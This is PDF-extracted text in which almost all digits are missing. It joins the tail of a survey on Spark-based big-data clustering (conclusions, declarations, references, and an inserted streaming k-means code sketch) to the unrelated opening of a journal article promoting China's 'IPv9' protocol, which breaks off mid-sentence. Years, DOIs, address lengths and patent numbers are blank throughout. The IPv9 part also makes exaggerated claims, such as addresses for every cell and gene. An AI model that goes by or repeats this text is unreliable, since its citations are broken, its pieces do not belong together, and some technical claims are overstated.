fatta & al ghamdi ( ), sarazin, azzag & lebbah ( b) science direct labrinidis & jagadish ( ), shirkhorshidi et al. ( ), rotsnarani & mrutyunjaya ( ), huang et al. ( ), zhang et al. ( ), maheshwar & haritha ( ), ianni et al. ( ), malondkar et al. ( ), rui et al. ( ), hosseini & kourosh ( ) • clustering methods to support the characteristics of variety and velocity of big data. additionally, support new aspects of clustering such as concept drift, scalability, integration, fault-tolerance, consistency, timeliness, load balancing, privacy, and incompleteness, etc. • clustering methods to utilize spark as it is an efficient big data platform. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table shows which papers in the survey were published in each of the last years. year of publication papers number of papers wang et al. ( ), santhi & jose ( ), sarazin, lebbah & azzag ( ), solaimani et al. ( ), chakravorty et al. ( ), solaimani et al. ( ), sarazin, azzag & lebbah ( b) verma, mansuri & jain ( ), shoro & soomro ( ), bhadani & jothimani ( ), rotsnarani & mrutyunjaya ( ), shobanadevi & maragatham ( ), jin et al. ( ), kim ( ), bonab et al. ( ) bhadani & jothimani ( ), dave & gianey ( ), ajin & kumar ( ), baltas, kanavos & tsakalidis ( ), gousios ( ), assefi et al. ( ), maheshwar & haritha ( ), wang et al. ( ), sinha & jana ( ), kusuma et al. ( ), backhoff & ntoutsi ( ), sharma, shokeen & mathur ( ), zayani, ben n’cir & essoussi ( ), shah ( ), bharill, tiwari & malviya ( ), pang et al. ( ), mallios et al. ( ), guo, zhang & zhang ( ), hassani et al. ( ), zhou & wang ( ), lulli, dell’amico & ricci ( ) baltas, kanavos & tsakalidis ( ), salloum et al. ( ), armbrust et al. ( ), xu & tian ( ), shirkhorshidi et al. ( ), rujal & dabhi ( ), ding et al. ( ), ben hajkacem, ben n’cir & essoussi ( ), wu et al. ( ), gao & zhang ( ), lighari & hussain ( ), kamaruddin, ravi & mayank ( ), rui et al. ( ), liang et al. ( ), sherar & zulkernine ( ) othman et al. ( ), hu et al. 
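to make the velocity-oriented research direction above more tangible, the following is a minimal, hedged sketch, not taken from any of the surveyed papers, of spark's built-in streaming k-means from the rdd-based mllib api, fed here by a synthetic queue stream; the batch interval, dimensionality and decay factor are arbitrary choices for this example.

```python
import numpy as np
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
from pyspark.mllib.clustering import StreamingKMeans
from pyspark.mllib.linalg import Vectors

sc = SparkContext(appName="streaming-kmeans-sketch")
ssc = StreamingContext(sc, 1)  # 1-second micro-batches

# synthetic stream: each micro-batch is an rdd of 2-d points around two centres
batches = [
    sc.parallelize([Vectors.dense(np.random.randn(2) + offset)
                    for offset in (0.0, 5.0) for _ in range(20)])
    for _ in range(5)
]
stream = ssc.queueStream(batches)

# a decay factor below 1 discounts old data, so the centres can track a drifting stream
model = StreamingKMeans(k=2, decayFactor=0.7).setRandomCenters(dim=2, weight=1.0, seed=42)
model.trainOn(stream)             # update the centres on every incoming micro-batch
model.predictOn(stream).pprint()  # emit cluster assignments for the same stream

ssc.start()
ssc.awaitTerminationOrTimeout(10)
ssc.stop(stopSparkContext=True)
```

a sketch of this kind only addresses velocity; combining it with support for variety (heterogeneous, unstructured data) remains one of the open directions highlighted in this survey.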
( ), kim ( ), xin et al. ( ), zerhari, lahcen & mouline ( ), sood, akshay & singh ( ), jiang et al. ( ), shanjiang et al. ( ), huang et al. ( ), ketu & agarwal ( ), ben hajkacem, ben n’cir & essoussi ( ), chitrakar & petrovic ( ), thakur & dharavath ( ), lee & kim ( ), luo et al. ( ), han et al. ( b), han et al. ( a), kim et al. ( ), baralis, garza & pastor ( ), aryal & wang ( ), gong, sinnott & rimba ( ), wang & qian ( ) aziz, zaidouni & bellafkih ( ), win et al. ( a), fatta & al ghamdi ( ), zhang et al. ( ), win et al. ( b), liu et al. ( ), lavanya, sairabanu & jain ( ), hosseini & kiani ( ), corizzo et al. ( ), hosseini & kourosh ( ), hasan et al. ( ), sembiring, jasni & embong ( ) ianni et al. ( ) conclusions as a consequence of the spread of smart devices and appearance of new technologies such as iot, huge data have been produced on daily bases. as a result, the concept of big data has appeared. unlike the traditional clustering approaches, big data clustering requires advanced parallel computing for better handling of data because of the enormous volume saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and complexity. therefore, this work contributes to the research in this area by providing a comprehensive overview of existing spark-based clustering techniques on big data and outlines some future directions in this area. due to the infancy of the big data platforms such as spark, the existing clustering techniques that are based on spark are only extensions of the traditional clustering techniques. there is still big room for developing clustering techniques designed specifically for spark making use of the random distribution of data onto spark partitions, called rdds, and the parallel computation of data in the individual rdds. through this survey we found that most existing spark-based clustering method support the volume characteristic of big data ignoring other characteristics. therefore, future research should focus on other characteristics as well such as variety and velocity. additionally, future spark-based clustering method should investigate new features such as concept drift, scalability, integration, fault-tolerance, consistency, timeliness, load balancing, privacy, etc. additional information and declarations funding the authors received support from the deanship of scientific research at prince sattam bin abdulaziz university for this research. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: deanship of scientific research at prince sattam bin abdulaziz university. competing interests the authors declare there are no competing interests. author contributions • mozamel m saeed conceived and designed the experiments, prepared figures and/or tables, and approved the final draft. • zaher al aghbari conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • mohammed alsharidah performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: no code or raw data is involved in this research as this is a literature review. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . 
/peerj-cs. references ajin vw, kumar ld. . big data and clustering algorithms. in: international conference on research advances in integrated navigation systems (rains). bangalore, – doi . /rains. . . armbrust mm, xin rs, lian c, huai y, liu d, bradley jk, meng x, kaftan t, franklin mj, ghodsi a, zaharia m. . spark sql: relational data processing in spark. in: proceedings of the acm sigmod international conference on management of data (sigmod ’ ). new york: association for computing machinery, – . aryal am, wang s. . sparksnn: a density-based clustering algorithm on spark. in: ieee rd international conference on big data analysis (icbda), shanghai. – doi . /icbda. . . assefi m, behravesh e, liu g, tafti a. . big data machine learning using apache spark mllib. in: ieee international conference on big data (big data), boston, ma. – doi . /bigdata. . . aziz k, zaidouni d, bellafkih m. . real-time data analysis using spark and hadoop. in: th international conference on optimization and applications (icoa). piscataway: ieee, – . aziz k, zaidouni d, bellafkih m. . big data optimisation among rdds persistence in apache spark. in: tabii y, lazaar m, al achhab m, enneya n, eds. big data, cloud and applications. bdca . communications in computer and information science, vol. . cham: springer. backhoff o, ntoutsi e. . scalable online-offline stream clustering in apache spark. parallel implementation of density peaks clustering algorithm based on spark. in: ieee th international conference on data mining workshops (icdmw), barcelona. – doi . /icdmw. . . baltas a, kanavos a, tsakalidis ak. . an apache spark implementation for sentiment analysis on twitter data. in: sellis t, oikonomou k k, eds. algorithmic aspects of cloud computing. algocloud . lecture notes in computer science, vol. . cham: springer. baralis e, garza p, pastor e. . a density-based preprocessing technique to scale out clustering. in: ieee international conference on big data (big data), seattle, wa, usa. piscataway: ieee, – doi . /bigdata. . . ben hajkacem ma, ben n’cir ce, essoussi n. scalable random sampling k-prototypes using spark. in: ordonez c, bellatreche l, eds. big data analytics and knowledge discovery. dawak . lecture notes in computer science, vol. . cham: springer. ben hajkacem ma, ben n’cir ce, essoussi n. . kp-s: a spark-based design of the k-prototypes clustering for big data. in: ieee/acs th international con- ference on computer systems and applications (aiccsa), hammamet. – doi . /aiccsa. . . bhadani ak, jothimani d. . big data: challenges, opportunities, and realities. in: effective big data management and opportunities for implementation. hershey: igi global. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /rains. . http://dx.doi.org/ . /icbda. . http://dx.doi.org/ . /bigdata. . http://dx.doi.org/ . /icdmw. . http://dx.doi.org/ . /bigdata. . http://dx.doi.org/ . /aiccsa. . http://dx.doi.org/ . /peerj-cs. bharill n, tiwari a, malviya a. fuzzy based scalable clustering algorithms for han- dling big data using apache spark. ieee transactions on big data : – doi . /tbdata. . . bonab mb, hashim szm, alsaedi akz, hashim ur. . modified k-means com- bined with artificial bee colony algorithm and differential evolution for color image segmentation. in: phon-amnuaisuk s, au t, eds. computational intelligence in information systems. advances in intelligent systems and computing, vol. . cham: springer. chakravorty a, rong c, evensen p, wlodarczyk tw. . 
a distributed gaussian- means clustering algorithm for forecasting domestic energy usage. in: international conference on smart computing, hong kong. – doi . /smartcomp. . . chitrakar as, petrovic s. . analyzing digital evidence using parallel k-means with triangle inequality on spark. in: ieee international conference on big data (big data), seattle, wa, usa. piscataway: ieee, – doi . /bigdata. . . corizzo r, pio g, ceci m, malerba d. . dencast: distributed density-based clustering for multi-target regression. journal of big data ( ): doi . /s - - - . dave m, gianey h. . different clustering algorithms for big data analytics: a review. in: international conference system modeling & advancement in research trends (smart), moradabad. – doi . /sysmart. . . ding d, li j, wang h, liang z. . student behavior clustering method based on campus big data. in: th international conference on computational intelligence and security (cis), hong kong. – doi . /cis. . . fasheng l, xiong l. . survey on text clustering algorithm -research present situation of text clustering algorithm. in: ieee nd international conference on software engineering and service science, beijing. piscataway: ieee, – doi . /icsess. . . fatta g, al ghamdi s. . efficient clustering techniques on hadoop and spark. international journal of big data intelligence ( – ): – . gao zq, zhang lj. . dphkms: an efficient hybrid clustering preserving differential privacy in spark. in: international conference on emerging internetworking, data & web technologies. gong y, sinnott ro, rimba p. rt-dbscan: real-time parallel clustering of spatio- temporal data using spark-streaming. in: shi y, et al., eds. computational science— iccs . iccs . lecture notes in computer science, vol. . cham: springer. gousios g. . big data software analytics with apache spark. in: proceedings of the th international conference on software engineering: companion proceeed- ings(icse ’ ). new york: association for computing machinery, – doi . / . . guo y, zhang j, zhang y. . an algorithm for analyzing the city residents’ activity information through mobile big data mining. in: ieee trustcom/bigdatase/ispa, tianjin. piscataway: ieee, – doi . /trustcom. . . saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tbdata. . http://dx.doi.org/ . /smartcomp. . http://dx.doi.org/ . /bigdata. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /sysmart. . http://dx.doi.org/ . /cis. . http://dx.doi.org/ . /icsess. . http://dx.doi.org/ . / . http://dx.doi.org/ . /trustcom. . http://dx.doi.org/ . /peerj-cs. han d, agrawal a, liao w, choudhary a. a. a fast dbscan algorithm with spark implementation. in: big data in engineering applications. studies in big data, vol. . singapore: springer. han d, agrawal a, liao w, choudhary a. b. parallel dbscan algorithm using a data partitioning strategy with spark implementation. in: ieee international conference on big data (big data), seattle, wa, usa. piscataway: ieee, – doi . /bigdata. . . hartigan ja, wong ma, algorithm as. . a k-means clustering algorithm. journal of the royal statistical society series c ( ): – . hasan ra, alhayali ra, zaki nd, ali ah. . an adaptive clustering and clas- sification algorithm for twitter data streaming in apache spark. telkom- nika telecommunication computing electronics and control : – doi . /telkomnika.v i . . hassani m, spaus p, cuzzocrea a, seidl t. . 
i-hastream: density-based hierarchical clustering of big data streams and its application to big graph analytics tools. in: th ieee/acm international symposium on cluster, cloud and grid computing (ccgrid). piscataway: ieee, – . hosseini b, kiani k. . a robust distributed big data clustering-based on adaptive density partitioning using apache spark. symmetry : doi . /sym . hosseini b, kourosh k. . a big data driven distributed density based hes- itant fuzzy clustering using apache spark with application to gene expres- sion microarray. engineering applications of artificial intelligence : – doi . /j.engappai. . . . hu s, xiao z, rao q, liao r. . an anomaly detection model of user behavior based on similarity clustering. in: ieee th information technology and mechatronics engineering conference (itoec), chongqing, china. piscataway: ieee, – doi . /itoec. . . huang f, zhu q, zhou j, tao j, zhou x, jin d, tan x, wang l. . research on the parallelization of the dbscan clustering algorithm for spatial data mining based on the spark platform. remote sensing ( ): doi . /rs . huang z. . extensions to the k-means algorithm for clustering large data sets with categorical values. data mining and knowledge discovery ( ): – doi . /a: . ianni m, masciari e, mazzeo gm, mezzanzanica m, zaniolo c. . fast and effective big data exploration by clustering. future generation computer systems : – doi . /j.future. . . . jain ak. . data clustering: years beyond k-means. pattern recognition letters ( ): – doi . /j.patrec. . . . jiang d, ooi b, shi l, wu s. . big data processing using hadoop: survey on schedul- ing. proceedings of the vldb endowment ( ): – . jin c, liu r, chen z, hendrix w, agrawal a, choudhary a. . a scalable hierarchical clustering algorithm using spark. in: ieee first international conference on big data saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bigdata. . http://dx.doi.org/ . /telkomnika.v i . http://dx.doi.org/ . /sym http://dx.doi.org/ . /j.engappai. . . http://dx.doi.org/ . /itoec. . http://dx.doi.org/ . /rs http://dx.doi.org/ . /a: http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /peerj-cs. computing service and applications, redwood city, ca. piscataway: ieee, – doi . /bigdataservice. . . kamaruddin s, ravi v, mayank p. parallel evolving clustering method for big data analytics using apache spark: applications to banking and physics. in: reddy p, sureka a, chakravarthy s, bhalla s, eds. big data analytics. bda . lecture notes in computer science, vol. . cham: springer. ketu s, agarwal s. . performance enhancement of distributed k-means clus- tering for big data analytics through in-memory computation. in: eighth international conference on contemporary computing (ic ), noida. – doi . /ic . . . kim j, shin m, kim j, park c, lee s, woo j, park s , et al. . cass: a distributed network clustering algorithm based on structure similarity for large-scale network. plos one :e doi . /journal.pone. . kusuma i, ma’sum ma, habibie n, jatmiko w, suhartanto h. . design of intelligent k-means based on spark for big data clustering. in: interna- tional workshop on big data and information security (iwbis), jakarta. – doi . /iwbis. . . labrinidis a, jagadish hv. . challenges and opportunities with big data. proceedings of the vldb endowment ( ): – doi . / . . lavanya k, sairabanu j, jain p. . clustering of zika virus epidemic using gaussian mixture model in spark environment. biomedical research-tokyo : – . 
lee s, kim d. distributed-based hierarchical clustering system for large-scale semicon- ductor wafers. in: ieee international conference on industrial engineering and engineering management (ieem). piscataway: ieee, – . liang m, li q, geng y, wang j, wei z. . remold: an efficient model-based clustering algorithm for large datasets with spark. in: ieee rd international conference on parallel and distributed systems (icpads), shenzhen. piscataway: ieee, – . lighari sn, hussain dma. . hybrid model of rule based and clustering anal- ysis for big data security. in: first international conference on latest trends in electrical engineering and computing technologies (intellect), karachi. – doi . /intellect. . . liu b, he s, he d, zhang y, guizani m. . a spark-based parallel fuzzy c -means segmentation algorithm for agricultural image big data. ieee access : – doi . /access. . . lulli a, dell’amico m, ricci l. . ng-dbscan: scalable density-based clus- tering for arbitrary data. proceedings of the vldb endowment : – doi . / . . luo g, luo x, gooch tf, tian l, qin k. . a parallel dbscan algorithm based on spark. in: ieee international conferences on big data and cloud computing (bdcloud), social computing and networking (socialcom), sustainable computing and communi- cations (sustaincom) (bdcloud-socialcom-sustaincom), atlanta, ga. piscataway: ieee, – doi . /bdcloud-socialcom-sustaincom. . . saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bigdataservice. . http://dx.doi.org/ . /ic . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /iwbis. . http://dx.doi.org/ . / . http://dx.doi.org/ . /intellect. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . / . http://dx.doi.org/ . /bdcloud-socialcom-sustaincom. . http://dx.doi.org/ . /peerj-cs. maheshwar rc, haritha d. . surveyon high performance analytics of big data with apache spark. in: international conference on advanced communication control and computing technologies (icaccct), ramanathapuram. – doi . /icaccct. . . mallios x, vassalos v, venetis t, vlachou a. a framework for clustering, classification of big data using spark. in: debruyne c, et al., eds. on the move to meaningful internet systems: otm conferences. otm . lecture notes in computer science, vol. . cham: springer,. malondkar a, corizzo r, kiringa i, ceci m, japkowicz n. . spark-ghsom: growing hierarchical self-organizing map for large scale mixed attribute datasets. information sciences : – doi . /j.ins. . . . manwal m, gupta a. . big data and hadoop—a technological survey. in: interna- tional conference on emerging trends in computing and communication technologies (icetcct), dehradun. – . mishra dd, pathan s, murthy c. . apache spark based analytics of squid proxy logs. in: ieee international conference on advanced networks and telecommunications sys- tems (ants), indore, india. piscataway: ieee, – doi . /ants. . . othman sm, ba-alwi fm, alsohybe nt, al-hashida ay. . intrusion detection model using machine learning algorithm on big data environment. journal of big data : doi . /s - - - . pang h, deng l, wang l, fei m. the application of spark-based gaussian mixture model for farm environmental data analysis. in: zhang l, song x, wu y, eds. theory, methodology, tools and applications for modeling and simulation of complex systems. asiasim , scs autumnsim . communications in computer and information science, vol. . singapore: springer. rotsnarani s, mrutyunjaya p. . big data analysis using hadoop: a survey. 
interna- tional journal of advanced research in computer science and software engineering ( ): – . rui l, xiaoge l, liping d, shuting z, mian w. . parallel implementation of density peaks clustering algorithm based on spark. procedia computer science : – doi . /j.procs. . . . rujal b, dabhi d. . extensive survey on k-means clustering using mapreduce in datamining. in: conference: international conference on electronics and communication systems (icecs) at: coimbatore, tamilnadu, india. salloum s, dautov r, chen x, peng px, huang jz. . big data analytics on apache spark. international journal of data science and analytics ( ): – doi . /s - - - . santhi v, jose r. . performance analysis of parallel k-means with optimization al- gorithms for clustering on spark. in: negi a, bhatnagar r, parida l, eds. distributed computing and internet technology. icdcit . lecture notes in computer science, vol. . cham: springer,. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /icaccct. . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /ants. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. sarazin t, azzag h, lebbah m. . som clustering using spark-mapreduce. in: ieee international parallel & distributed processing symposium workshops, phoenix, az. piscataway: ieee, – doi . /ipdpsw. . . sarazin t, lebbah m, azzag h. . biclustering using spark-mapreduce. in: ieee international conference on big data (big data), washington, dc. piscataway: ieee, – doi . /bigdata. . . sembiring rw, jasni mz, embong a. . clustering high dimensional data using subspace and projected clustering algorithms. international journal of computer science & information technology : – doi . /ijcsit. . . shah j. . new clustering using spark. international journal of latest technology in engineering, management & applied science ( ): – . shanjiang t, he b, yu c, li y, li k. . a survey on spark ecosystem for big data processing. sharma t, shokeen v, mathur d. . multiple k-means++ clustering of satellite image using hadoop mapreduce and spark. international journal of advanced studies in computer science and engineering ( ). sherar m, zulkernine f. . particle swarm optimization for large-scale clustering on apache spark. in: ieee symposium series on computational intelligence (ssci), honolulu, hi. piscataway: ieee, – doi . /ssci. . . shirkhorshidi as, aghabozorgi s, wah ty, herawan t. big data clustering: a review. in: computational science and its applications –iccsa . iccsa . lecture notes in computer science, vol . cham: springer. shobanadevi a, maragatham g. . studying the performance of clusteringtechniques for biomedical data using spark. in: international conference on intelligent sustainable systems (iciss), palladam. – doi . /iss . . . shoro sag, soomro tr. . big data analysis: apache spark perspective. global journal of computer science and technology ( ). sinha a, jana pk. . a novel k-means based clustering algorithm for big data. in: international conference on advances in computing, communications and informatics (icacci), jaipur. – . solaimani m, iftekhar m, khan l, thuraisingham b, ingram jb. spark-based anomaly detection over multi-source vmware performance data in real-time. in: ieee symposium on computational intelligence in cyber security (cics). piscataway: ieee, – . solaimani m, iftekhar m, khan l, thuraisingham b, ingram jb. . 
spark-based anomaly detection over multi-source vmware performance data in real-time. in: ieee symposium on computational intelligence in cyber security (cics), orlando, fl. piscataway: ieee, – doi . /cicybs. . . sood s, singh r. . a survey of performance improvement techniques for hadoop. international journal of applied engineering research ( ): – . thakur s, dharavath r. . kmdt: a hybrid cluster approach for anomaly detection using big data. in: information and decision sciences. advances in intelligent systems and computing, vol. . singapore: springer. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ipdpsw. . http://dx.doi.org/ . /bigdata. . http://dx.doi.org/ . /ijcsit. . http://dx.doi.org/ . /ssci. . http://dx.doi.org/ . /iss . . http://dx.doi.org/ . /cicybs. . http://dx.doi.org/ . /peerj-cs. verma a, mansuri ah, jain n. . big data management processing with hadoop mapreduce and spark technology: a comparison. in: symposium on colossal- data analysis and networking (cdan), indore. – doi . /cdan. . . wang b, yin j, hua q, wu z, cao j. . parallelizing k-means-based clustering on spark. in: international conference on advanced cloud and big data (cbd), chengdu. – doi . /cbd. . . wang y, qian q. . a spark-based artificial bee colony algorithm for large- scale data clustering. in: ieee th international conference on high perfor- mance computing and communications; ieee th international conference on smart city; ieee th international conference on data science and systems (hpc- c/smartcity/dss), exeter, united kingdom. piscataway: ieee, – doi . /hpcc/smartcity/dss. . . win kn, chen j, chen y, fournier-viger p. a. pcpd: a parallel crime pattern discovery system for large-scale spatiotemporal data based on fuzzy clustering. in- ternational journal of fuzzy systems : – doi . /s - - - . win kn, chen j, xiao g, chen y, viger pf. b. a parallel crime activity clustering algorithm based on apache spark cloud computing platform. in: ieee st interna- tional conference on high performance computing and communications; zhangjiajie, china. – doi . /hpcc/smartcity/dss. . . wu j, wu z, cao j, liu h, chen g, zhang y. . fuzzy consensus clustering with applications on big data. ieee transactions on fuzzy systems ( ): – doi . /tfuzz. . . xin rs, gonzalez je, franklin mj, stoica i. . graphx: aresilient distributed graph system on spark. in: first international workshop on graph data management experi- ences and systems. – : . xu d, tian y. . a comprehensive survey of clustering algorithms. annals of data science ( ): – doi . /s - - - . zayani a, ben n’cir c, essoussi n. . parallel clustering method for non-disjoint partitioning of large-scale data based on spark framework. in: ieee international conference on big data (big data), washington, dc. piscataway: ieee, – . zerhari b, lahcen aa, mouline s. . big data clustering: algorithms and challenges. in: proceedings of the international conference on big data, cloud and applications, tetuan, morocco. – . zhang y, liu h, chen t, tang d. . a distributed pcm clustering algorithm based on spark. in: proceedings of the th international conference on machine learning and computing (icmlc ’ ). new york: association for computing machinery, – doi . / . . zhou q, wang j. sparkscan: a structure similarity clustering algorithm on spark. in: big data technology and applications. bdta . communications in computer and information science, vol. . singapore: springer. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /cdan. . http://dx.doi.org/ . /cbd. . http://dx.doi.org/ . /hpcc/smartcity/dss. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /hpcc/smartcity/dss. . http://dx.doi.org/ . /tfuzz. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research and implementation of future network ipv liu zhang . school of computer science and engineering xi'an technological university xi'an, , china . state and provincial joint engineering lab. of advanced network, monitoring and control xi'an, china e-mail: @qq.com wang yubian department of railway transportation control belarusian state university of transport , kirova street, gomel, republic of belarus e-mail: alika_wang@mail.ru abstract—nowadays, ipv has been difficult to meet the needs of the internet in terms of performance, address space, security, etc. in order to solve the relevant needs of ipv , protocols such as ipv and ipv have been born. this article introduces the current status and characteristics of ipv and ipv , compares with ipv , summarizes the relevant characteristics of ipv , and introduces the production process of ipv , its protocol composition, system architecture and related application introduction. ipv is controlled by my chinese core technology and has independent intellectual property rights, which is the foundation of my country's future network. keywords-future network; decimal system; ipv i. ip a. the introduction of ip ip(internet protocol), is the network layer protocol in the tcp/ip architecture. when we use the internet, the most important question is whether my messages and actions can be successfully sent and whether i can receive messages from the outside. today, our needs are fundamentally assured through ip. sending and receiving is actually a kind of information transmission, our various operations will be various applications in the form of packets for transmission. the problem is getting from the beginning to the end, and it's not a direct highway, but a ladder of different routes that takes multiple hops to get there. the purpose of ip is to solve the problems of network connection and computer communication. each ip address consists of a network address (netid) and a host address (hostid). a network address represents which network in the internet it belongs to, and a host address represents which host in that network it belongs to. b. the introduction of ip address ip address(internet protocol address), is a unified address format that assigns a logical address to each network and host on the internet, just like our mobile phone number, which can be used to mask the physical address differences while making communication more convenient. all ip addresses consist of network id and host id. depending on the network id and host id, the internet commission has defined five ip address types to suit networks of different capacities, namely class a to class e. among them, a, b and c are the basic classes, while d and e are used as multicast and reserved. this is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . ip address ii. the features and problems of ipv and ipv a. 
The present situation of IPv4

IPv4 has played a key role in the development of networks, but as networks have grown it can no longer meet demand. The first problem is that address resources are exhausted, leading directly to an address crisis; classless addressing (CIDR) and network address translation (NAT) alleviate the shortage but do not solve it. The second problem is the expansion of the routing table: because the address space has no topological structure, address allocation is unrelated to the network topology, so as the number of networks and routers grows the routing table over-expands, raising lookup and storage costs and becoming a bottleneck of the Internet. At the same time, the IPv4 header length is not fixed, which makes it inconvenient for hardware to extract and parse headers and select routes, and therefore difficult to raise routing throughput. IP addresses are also distributed unevenly: because the Internet originated in the United States, more than half of all addresses are held there, a serious imbalance. Finally, IPv4 lacks quality-of-service (QoS) support. It was not designed with open public use in mind, so it provides little security, and it is difficult to offer rich QoS functions for real-time multimedia, mobile IP, and other commercial services; protocols developed later, such as RSVP, add QoS support, but the cost of planning and building such an IP network is relatively high.

b. The features and problems of IPv6

IPv4 is a widely deployed Internet protocol that is simple, easy to implement, and interoperable. However, with the rapid development of the Internet, the deficiencies of its design have become increasingly obvious: the address space is insufficient, and the number of routing table entries that must be maintained is too large. To solve these problems, the IETF designed IPv6. Compared with IPv4, IPv6 has the following features:

• IPv6 has a larger address space. An IPv4 address is 32 bits long, giving roughly 2^32 addresses, whereas an IPv6 address is 128 bits long, giving roughly 2^128 addresses, a vast increase over the 32-bit space (see the sketch after this list).
• IPv6 uses smaller routing tables. IPv6 addresses are assigned following the principle of aggregation from the outset, so a router can represent a whole subnet with a single routing-table entry, greatly shortening routing tables and speeding up packet forwarding.
• IPv6 adds enhanced multicast support and flow control, which enables multimedia applications on the network and provides a good platform for QoS control.
• IPv6 adds support for auto-configuration, an improvement and extension of DHCP that makes network management more convenient and fast.
• IPv6 has a better header format: options are separated from the base header and can be inserted between the base header and the upper-layer data when needed. This simplifies and speeds up routing, because most options do not need to be processed by routers.
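To make the address-space gap and the aggregation principle concrete, the short sketch below uses only Python's standard-library ipaddress module. It is an editorial illustration, not part of the original article, and the example prefixes are arbitrary documentation addresses.

```python
import ipaddress

# Address-space sizes: 32-bit IPv4 versus 128-bit IPv6.
print(f"IPv4 addresses: 2**32  = {2**32}")
print(f"IPv6 addresses: 2**128 = {2**128}")

# Aggregation: many contiguous IPv6 subnets can be announced as one routing entry.
subnets = [ipaddress.ip_network(f"2001:db8:0:{i:x}::/64") for i in range(256)]
aggregate = ipaddress.collapse_addresses(subnets)
print("Aggregated route:", [str(n) for n in aggregate])  # ['2001:db8::/56']
```

Collapsing the 256 /64 prefixes into a single /56 announcement is exactly the aggregation that keeps IPv6 routing tables small.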
despite the obvious advantages of ipv , the number of ipv routers is huge, and the transition from ipv to ipv is a gradual process, with ipv being backward compatible. therefore, ipv and ipv will coexist for a long time to come. in addition, ipv has a big flaw in the design idea of its address structure. ipv confuses the network hierarchy in design. the interface id embeds the physical address into the logical address layer, which on the one hand leads to the limitation of the physical address space to the empty ip address. security does not belong to the content of the ip layer, so it is inappropriate to design security technology in the ip layer. because with the development of security technology, security methods and key length will constantly change, so the development of security technology will eventually lead to the requirements of ip address redesign. due to the chaotic logic of the network hierarchy, ipv creates far more new problems than it solves. iii. the introduction of ipv a. the production of ipv in , chinese researcher xie jianping proposed ipv , which means "method of using whole digital code to assign address for computer." ipv is a "nickname" borrowed from the american concept of ip. in order to distinguish china's ipv from america's ipv and ipv , the v in china's ipv is uppercase, not lowercase. the patent covers the new address coding design, the new addressing mechanism and new address three technical architecture design, form a new system of ip network at the bottom of the core technology, on the basis of the design of the new framework, to form a network system that is connected and compatible to cover the existing network (the internet using ipv and ipv technologies). in , the authoritative professional agencies of the us government confirmed legally and technically that china owns the core technologies of the sovereign network under the ip framework, which are different from the existing technologies of the us internet and have independent intellectual property rights. this is the ipv patented technology, the official name of the patent is "the method of assigning addresses to computers in full numeric code." china's ipv was approved in (cn ), and has been granted patents in more than countries and regions including south africa, turkey, kazakhstan, russia, the republic of korea, the democratic people's republic of korea, hong kong, canada, singapore, australia, mexico and norway. international journal of advanced network, monitoring and controls volume , no. , in , ipv applied for the us patent, which was successively issued by the us patent office seven times with "non-final rejection opinions" and six times with final rejection letters. during this period, it was repeatedly criticized by senior members of the us ietf and famous it companies in the us. in december , the united states patent and trademark office (pto) officially issued the patent certificate no. and us , , , and stated in its notification of approval that the applicant's verification report was "very convincing". ipv protocol refers to the - arabic digital network as virtual ip address, and the decimal system as the text of the representation method, that is, a convenient way to find the use of the internet users; for efficiency and end-user convenience, some of the addresses can be used as domain directly; it has an infinite number of allocatable ip addresses, with a maximum of by bits, and is the cornerstone of the future digital world. 
at the same time, due to the use of the original computer network, cable broadcast television network and telecommunications network business classification code, therefore, also known as the "new generation of secure and reliable information integrated network protocol." b. the characteristics of ipv compared with ipv and ipv , ipv has more obvious features and advantages, mainly reflected in the following points: ) address space is huge ipv has a larger address space than ipv /ipv . ipv defines the bit length of ip address is , that is, there are - addresses; while the length of ipv is , that is, - addresses, the standard length of an ipv address is - , with layers address structure design will be - ( - ). to put it mildly, if ipv were widely used, every grain of sand in the world would have an ip address. then after ipv is widely used, the smallest molecule of bright matter in the whole universe will have a corresponding address. it is no exaggeration to say that if ipv is fully applied, every cell and living gene in the world can be assigned to an ipv address. layer is the asset management address (including legal digital currency space) compatible with ean-ucc barcode length. ) route tables are smaller ipv has a smaller routing table than ipv . the address allocation of ipv follows the principle of aggregation at the beginning, which enables the router to represent a subnet with an entry in the table, this greatly reducing the length of routing table in the router, and improving the speed of forwarding packets in the routing table. the routing table of ipv is very small, and the address allocation of ipv follows the principle of geo-spatial clustering from the beginning, which enables ipv router to represent a country subnet and an application subnet with a single record, it greatly reducing the length and cleanliness of routing table in the router, and improving the speed of forwarding packets by routing table. at the same time, this subnet can express a specific geographical location, for example, we assign the ipv address segment of shanghai as [ [ ]/ , then in 